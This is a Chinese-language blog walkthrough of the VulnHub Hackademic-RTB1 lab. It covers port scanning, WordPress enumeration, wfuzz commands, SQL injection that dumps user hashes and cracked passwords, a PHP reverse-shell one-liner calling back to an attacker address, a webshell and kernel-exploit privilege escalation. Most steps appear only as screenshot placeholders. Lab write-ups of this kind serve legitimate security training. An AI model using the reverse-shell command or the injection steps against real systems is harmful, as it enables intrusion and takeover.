5、Hackademic-RTB1(VulnHub)

Hackademic-RTB1

一、nmap

image-20240322140410087

扫全端口会爆炸,暂时使用默认先扫描出两个

image-20240322140923405

image-20240322162511188

image-20240322142911428

二、web渗透

随便看看

image-20240322142930159

简单目录爆破

image-20240322140706390

/Hackademic_RTB1/

根据界面提示,我们可以来到这个目录

image-20240322144011844

源码处发现框架

image-20240322144050029

再次目录爆破

image-20240322144109703

wscan扫描

image-20240322144223349

WordPress 1.5.1

image-20240322144848502

searchsploit

image-20240322160147228

/wp-content/plugins/

在目录爆破中发现插件目录,这边尝试通过插件进行渗透

image-20240322144653056

wfuzz

好像都没有东西

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/hello.php?FUZZ=somethings

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/textile1.php?FUZZ=somethings

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/markdown.php?FUZZ=somethings

好像思路都走不通了,我们往回走看看是不是遗漏了什么东西

/Hackademic_RTB1/?p=9

通过点击Got root?!,我们来到了一个新的界面,看url就明白了

image-20240322151108352

sql注入

p参数

没注入,不会吧

image-20240322151157717

image-20240322151211732

cat参数

通过点击Uncategorized,发现有又一个新的界面

image-20240322151300043

确定存在sql注入了

image-20240322151310436

这里是靶场,就直接dump出来咯,实战中可别这样做

image-20240322152324089

NickJames		21232f297a57a5a743894a0e4a801fc3 (admin)
GeorgeMiller	7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)

目录扫描尝试登入后台

成功

image-20240322152650003

这个用户登入进去,发现能做的操作很少,尝试换其他用户登入,GeorgeMiller:q1w2e3

image-20240322160020174

尝试php反弹shell

通过刷新hello.php,还是无法连接

php -r '$sock=fsockopen("192.168.126.201",11111);exec("/bin/sh -i <&3 >&3 2>&3");'

image-20240322160921552

添加上传文件白名单

image-20240322161650993

image-20240322162630823

image-20240322162156686

image-20240322162208227

拿下webshell

image-20240322162243010

三、内网渗透

image-20240322162725744

计划任务

image-20240322163400961

查看版本情况

image-20240322163540273

尝试内核提权漏洞

失败1

image-20240322164103842

image-20240322164130597

失败2

image-20240322164659944

image-20240322164842128

失败3

image-20240322164933593

image-20240322165044393

失败4

由于版本问题通杀提权也失败了

image-20240322170104926

大范围搜索漏洞,只能一个一个试

image-20240322170159214

使用15285.c

image-20240322170502296

image-20240322171012151

image-20240322170618873

内核漏洞提权成功

image-20240322170651295

ket.txt/ket.txt~

image-20240322170736192

posted @ 2024-04-10 12:24  gcc_com  阅读(5)  评论(0编辑  收藏  举报